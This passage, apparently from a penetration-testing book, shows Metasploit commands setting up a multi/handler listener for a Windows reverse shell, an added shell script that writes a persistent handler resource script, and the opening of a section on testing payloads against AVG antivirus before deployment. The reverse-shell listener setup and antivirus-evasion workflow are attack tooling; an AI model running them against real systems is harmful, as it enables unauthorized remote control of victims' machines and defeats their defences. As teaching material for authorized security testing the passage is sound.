Avoiding Detection
msf > use exploit/multi/handler
msf exploit(handler) > show options
. . . SNIP . . .

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.101    yes       The local address
   LPORT     4444             yes       The local port

. . . SNIP . . .
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) >
We first load the multi/handler module and get a quick display of its options with show options. Then we set the payload to windows/shell_reverse_tcp, a plain Windows reverse shell, so that the handler matches the behavior of the executable we created earlier (a handler configured for a different payload, such as the Meterpreter stager shown in the default options, would not be able to talk to that executable). We tell it the IP address to listen on with LHOST and the port with LPORT, and we're ready to go.
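The handler setup above, automated as a msfconsole resource script, as an added example that is not code from the book or from the Metasploit project: it validates LHOST and LPORT before writing the same use/set sequence, and it adds the two settings a practitioner usually wants while iterating against antivirus, so one listener survives repeated test connections. The ExitOnSession option and the exploit -j -z flags are standard msfconsole features; the helper function names and the file name handler.rc are my own, and the script assumes it is loaded with msfconsole -r handler.rc.

```shell
#!/bin/sh
# Added example (not from the book): build a resource script for
# exploit/multi/handler whose PAYLOAD, LHOST and LPORT are checked first,
# so they match what was compiled into the executable built earlier.
# Assumption: the output is saved as handler.rc and loaded with
#   msfconsole -r handler.rc

# Succeed only if $1 is an integer in 1..65535.
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Succeed only if $1 is a dotted-quad IPv4 address with each octet in 0..255.
# Runs in a subshell so changing IFS and disabling globbing stays local.
valid_ipv4() (
  IFS=.
  set -f
  set -- $1
  [ "$#" -eq 4 ] || return 1
  for octet in "$@"; do
    case "$octet" in
      ''|*[!0-9]*) return 1 ;;
    esac
    [ "$octet" -le 255 ] || return 1
  done
  return 0
)

# Print the resource script for the handler, or fail with a message on bad input.
# Usage: make_handler_rc PAYLOAD LHOST LPORT > handler.rc
make_handler_rc() {
  payload=$1; lhost=$2; lport=$3
  case "$payload" in
    ''|*[[:space:]]*) echo "bad PAYLOAD: '$payload'" >&2; return 1 ;;
    */*) ;;
    *) echo "PAYLOAD must be a module path such as windows/shell_reverse_tcp" >&2; return 1 ;;
  esac
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }

  printf 'use exploit/multi/handler\n'
  printf 'set PAYLOAD %s\n' "$payload"
  printf 'set LHOST %s\n' "$lhost"
  printf 'set LPORT %s\n' "$lport"
  # Keep listening after the first session comes in, so one handler serves
  # repeated test runs; -j backgrounds the job, -z skips auto-interaction.
  printf 'set ExitOnSession false\n'
  printf 'exploit -j -z\n'
}

# Same listener as the transcript above: plain reverse shell on 192.168.1.101:31337.
make_handler_rc windows/shell_reverse_tcp 192.168.1.101 31337
```

Redirect the script's output to handler.rc and load it with msfconsole -r; the handler comes up as a background job and stays up, so every new build of the payload executable can be tested against the same listener.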
Evading Antivirus Detection
We’ll use the popular AVG Anti-Virus product in the following examples. Circumventing a given antivirus engine can take some time and multiple tries, so before we deploy a payload on the target we test it against the antivirus solution the target runs and confirm that it gets past it.
In this case, when we test our payload against AVG, it is detected, as shown in Figure 7-1.
Figure 7-1: AVG detected our payload.